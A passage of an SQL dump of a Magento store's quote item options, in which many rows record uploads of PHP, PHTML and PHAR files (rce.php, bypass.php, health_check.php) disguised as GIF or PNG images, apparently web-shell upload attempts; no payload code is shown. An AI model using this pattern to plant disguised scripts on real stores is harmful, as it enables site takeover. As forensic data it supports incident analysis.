(316, 304, 2062, 'info_buyRequest', '{\"options\":{\"504\":{\"type\":\"image\\/gif\",\"title\":\"504index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/0\\/504index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/0\\/504index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/0\\/504index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(317, 305, 2062, 'info_buyRequest', '{\"options\":{\"941\":{\"type\":\"image\\/gif\",\"title\":\"941index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/4\\/941index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/4\\/941index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/4\\/941index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(318, 306, 2062, 'info_buyRequest', '{\"options\":{\"420\":{\"type\":\"image\\/gif\",\"title\":\"420index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/2\\/420index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/2\\/420index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/2\\/420index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(319, 307, 2062, 'info_buyRequest', '{\"options\":{\"194\":{\"type\":\"image\\/gif\",\"title\":\"194index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/9\\/194index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/9\\/194index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/9\\/194index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(320, 308, 2062, 'info_buyRequest', '{\"options\":{\"122\":{\"type\":\"image\\/gif\",\"title\":\"122index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/2\\/122index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/2\\/122index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/2\\/122index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(321, 309, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"wh26uwim.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/w\\/h\\/wh26uwim.php\",\"quote_path\":\"custom_options\\/quote\\/w\\/h\\/wh26uwim.php\",\"order_path\":\"custom_options\\/quote\\/w\\/h\\/wh26uwim.php\",\"size\":1018,\"width\":15419,\"height\":28735,\"secret_key\":\"6fc9893a509bea147617\"}},\"qty\":1}'),
(322, 310, 2062, 'info_buyRequest', '{\"options\":{\"682\":{\"type\":\"image\\/gif\",\"title\":\"682index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/8\\/682index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/8\\/682index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/8\\/682index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(323, 311, 2062, 'info_buyRequest', '{\"options\":{\"592\":{\"type\":\"image\\/gif\",\"title\":\"592index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/9\\/592index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/9\\/592index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/9\\/592index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(324, 312, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"x1abyxbn.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/x\\/1\\/x1abyxbn.php\",\"quote_path\":\"custom_options\\/quote\\/x\\/1\\/x1abyxbn.php\",\"order_path\":\"custom_options\\/quote\\/x\\/1\\/x1abyxbn.php\",\"size\":1018,\"width\":15419,\"height\":28735,\"secret_key\":\"6fc9893a509bea147617\"}},\"qty\":1}'),
(325, 313, 2054, 'info_buyRequest', '{\"qty\":1}'),
(326, 314, 2062, 'info_buyRequest', '{\"options\":{\"718\":{\"type\":\"image\\/gif\",\"title\":\"718index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/1\\/718index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/1\\/718index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/1\\/718index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(327, 315, 2062, 'info_buyRequest', '{\"options\":{\"844\":{\"type\":\"image\\/gif\",\"title\":\"844index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/4\\/844index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/4\\/844index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/4\\/844index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(328, 316, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce_7.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce_7.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce_7.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"d3a285ff4fc93844c464\"}},\"qty\":1}'),
(329, 317, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index_7.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index_7.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index_7.php\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"ebecc5dacff289dcc868\"}},\"qty\":1}'),
(330, 318, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_7.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_7.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_7.phtml\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"2437e2a4060c773418da\"}},\"qty\":1}'),
(331, 319, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_7.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_7.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_7.php\",\"size\":328,\"width\":1,\"height\":1,\"secret_key\":\"a91751e6b0599a9a452c\"}},\"qty\":1}'),
(332, 320, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_7.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_7.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_7.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"d36de658a167a1de7893\"}},\"qty\":1}'),
(333, 321, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c_7.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c_7.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c_7.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"cbd4952517282b2c9cdd\"}},\"qty\":1}'),
(334, 322, 2062, 'info_buyRequest', '{\"options\":{\"502\":{\"type\":\"image\\/gif\",\"title\":\"502index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/0\\/502index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/0\\/502index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/0\\/502index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(335, 323, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"hf2lu53b.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/h\\/f\\/hf2lu53b.php\",\"quote_path\":\"custom_options\\/quote\\/h\\/f\\/hf2lu53b.php\",\"order_path\":\"custom_options\\/quote\\/h\\/f\\/hf2lu53b.php\",\"size\":1018,\"width\":15419,\"height\":28735,\"secret_key\":\"6fc9893a509bea147617\"}},\"qty\":1}'),
(336, 324, 2062, 'info_buyRequest', '{\"options\":{\"934\":{\"type\":\"image\\/gif\",\"title\":\"934index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/3\\/934index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/3\\/934index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/3\\/934index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(337, 325, 2062, 'info_buyRequest', '{\"options\":{\"856\":{\"type\":\"image\\/gif\",\"title\":\"856index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/5\\/856index_1.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/5\\/856index_1.php\",\"order_path\":\"custom_options\\/quote\\/8\\/5\\/856index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(338, 326, 2062, 'info_buyRequest', '{\"options\":{\"644\":{\"type\":\"image\\/gif\",\"title\":\"644index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/4\\/644index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/4\\/644index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/4\\/644index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(339, 327, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/png\",\"title\":\"kosib294.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/k\\/o\\/kosib294.php\",\"quote_path\":\"custom_options\\/quote\\/k\\/o\\/kosib294.php\",\"order_path\":\"custom_options\\/quote\\/k\\/o\\/kosib294.php\",\"size\":1103,\"width\":1,\"height\":1,\"secret_key\":\"9f7dcfe4b37c921545bb\"}},\"qty\":1}'),
(340, 328, 2062, 'info_buyRequest', '{\"options\":{\"539\":{\"type\":\"image\\/gif\",\"title\":\"539index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/3\\/539index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/3\\/539index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/3\\/539index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(341, 329, 2062, 'info_buyRequest', '{\"options\":{\"872\":{\"type\":\"image\\/gif\",\"title\":\"872index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/7\\/872index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/7\\/872index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/7\\/872index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(342, 330, 2062, 'info_buyRequest', '{\"options\":{\"333\":{\"type\":\"image\\/gif\",\"title\":\"333index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/3\\/333index_1.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/3\\/333index_1.php\",\"order_path\":\"custom_options\\/quote\\/3\\/3\\/333index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(343, 331, 2062, 'info_buyRequest', '{\"options\":{\"507\":{\"type\":\"image\\/gif\",\"title\":\"507index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/0\\/507index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/0\\/507index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/0\\/507index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(344, 332, 2062, 'info_buyRequest', '{\"options\":{\"189\":{\"type\":\"image\\/gif\",\"title\":\"189index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/8\\/189index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/8\\/189index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/8\\/189index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(345, 333, 2062, 'info_buyRequest', '{\"options\":{\"499\":{\"type\":\"image\\/gif\",\"title\":\"499index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/9\\/499index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/9\\/499index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/9\\/499index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(346, 334, 2062, 'info_buyRequest', '{\"options\":{\"382\":{\"type\":\"image\\/gif\",\"title\":\"382index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/8\\/382index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/8\\/382index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/8\\/382index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(347, 335, 2062, 'info_buyRequest', '{\"options\":{\"960\":{\"type\":\"image\\/gif\",\"title\":\"960index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/6\\/960index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/6\\/960index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/6\\/960index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(348, 336, 2062, 'info_buyRequest', '{\"options\":{\"683\":{\"type\":\"image\\/gif\",\"title\":\"683index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/8\\/683index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/8\\/683index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/8\\/683index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(349, 337, 2062, 'info_buyRequest', '{\"options\":{\"700\":{\"type\":\"image\\/gif\",\"title\":\"700index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/0\\/700index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/0\\/700index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/0\\/700index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(350, 338, 2062, 'info_buyRequest', '{\"options\":{\"783\":{\"type\":\"image\\/gif\",\"title\":\"783index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/783index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/783index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/783index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(351, 339, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/png\",\"title\":\"mafl1dom.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/m\\/a\\/mafl1dom.php\",\"quote_path\":\"custom_options\\/quote\\/m\\/a\\/mafl1dom.php\",\"order_path\":\"custom_options\\/quote\\/m\\/a\\/mafl1dom.php\",\"size\":1103,\"width\":1,\"height\":1,\"secret_key\":\"9f7dcfe4b37c921545bb\"}},\"qty\":1}'),
(352, 340, 2062, 'info_buyRequest', '{\"options\":{\"600\":{\"type\":\"image\\/gif\",\"title\":\"600index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/0\\/600index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/0\\/600index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/0\\/600index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(353, 341, 2059, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"jeo1babq.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/j\\/e\\/jeo1babq.php\",\"quote_path\":\"custom_options\\/quote\\/j\\/e\\/jeo1babq.php\",\"order_path\":\"custom_options\\/quote\\/j\\/e\\/jeo1babq.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(354, 342, 2054, 'info_buyRequest', '{\"options\":{\"1\":{\"type\":\"image\\/png\",\"title\":\"jeo1babq.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/j\\/e\\/jeo1babq_1.php\",\"quote_path\":\"custom_options\\/quote\\/j\\/e\\/jeo1babq_1.php\",\"order_path\":\"custom_options\\/quote\\/j\\/e\\/jeo1babq_1.php\",\"size\":1159,\"width\":1,\"height\":1,\"secret_key\":\"2b8f02e6ad095024adcc\"}},\"qty\":1}'),
(355, 343, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(356, 344, 2062, 'info_buyRequest', '{\"options\":{\"139\":{\"type\":\"image\\/gif\",\"title\":\"139index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/3\\/139index_1.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/3\\/139index_1.php\",\"order_path\":\"custom_options\\/quote\\/1\\/3\\/139index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(357, 345, 2061, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tLw,,\",\"product\":\"2061\",\"qty\":1}'),
(358, 346, 2062, 'info_buyRequest', '{\"options\":{\"236\":{\"type\":\"image\\/gif\",\"title\":\"236index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/3\\/236index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/3\\/236index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/3\\/236index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(359, 347, 2062, 'info_buyRequest', '{\"options\":{\"615\":{\"type\":\"image\\/gif\",\"title\":\"615index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/1\\/615index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/1\\/615index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/1\\/615index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(360, 348, 2062, 'info_buyRequest', '{\"options\":{\"940\":{\"type\":\"image\\/gif\",\"title\":\"940index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/4\\/940index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/4\\/940index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/4\\/940index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(361, 349, 2062, 'info_buyRequest', '{\"options\":{\"511\":{\"type\":\"image\\/gif\",\"title\":\"511index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/1\\/511index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/1\\/511index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/1\\/511index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(362, 350, 2062, 'info_buyRequest', '{\"options\":{\"681\":{\"type\":\"image\\/gif\",\"title\":\"681index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/8\\/681index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/8\\/681index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/8\\/681index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}');
INSERT INTO `quote_item_option` (`option_id`, `item_id`, `product_id`, `code`, `value`) VALUES
(363, 351, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"yindex.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/y\\/i\\/yindex.php\",\"quote_path\":\"custom_options\\/quote\\/y\\/i\\/yindex.php\",\"order_path\":\"custom_options\\/quote\\/y\\/i\\/yindex.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(364, 352, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"yget.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/y\\/g\\/yget.php\",\"quote_path\":\"custom_options\\/quote\\/y\\/g\\/yget.php\",\"order_path\":\"custom_options\\/quote\\/y\\/g\\/yget.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(365, 353, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"ystatic.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/y\\/s\\/ystatic.php\",\"quote_path\":\"custom_options\\/quote\\/y\\/s\\/ystatic.php\",\"order_path\":\"custom_options\\/quote\\/y\\/s\\/ystatic.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(366, 354, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"yhealth_check.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/y\\/h\\/yhealth_check.php\",\"quote_path\":\"custom_options\\/quote\\/y\\/h\\/yhealth_check.php\",\"order_path\":\"custom_options\\/quote\\/y\\/h\\/yhealth_check.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(367, 355, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/i\\/n\\/index_7.php\",\"quote_path\":\"custom_options\\/quote\\/i\\/n\\/index_7.php\",\"order_path\":\"custom_options\\/quote\\/i\\/n\\/index_7.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(368, 356, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"get.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/g\\/e\\/get_2.php\",\"quote_path\":\"custom_options\\/quote\\/g\\/e\\/get_2.php\",\"order_path\":\"custom_options\\/quote\\/g\\/e\\/get_2.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(369, 357, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_8.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_8.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_8.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(370, 358, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"health_check.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/h\\/e\\/health_check.php\",\"quote_path\":\"custom_options\\/quote\\/h\\/e\\/health_check.php\",\"order_path\":\"custom_options\\/quote\\/h\\/e\\/health_check.php\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
(371, 359, 2054, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"imsyqo.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/i\\/m\\/imsyqo.phar\",\"quote_path\":\"custom_options\\/quote\\/i\\/m\\/imsyqo.phar\",\"order_path\":\"custom_options\\/quote\\/i\\/m\\/imsyqo.phar\",\"size\":903,\"width\":15419,\"height\":28735,\"secret_key\":\"93599c74b59c0ea185c2\"}},\"qty\":1}'),
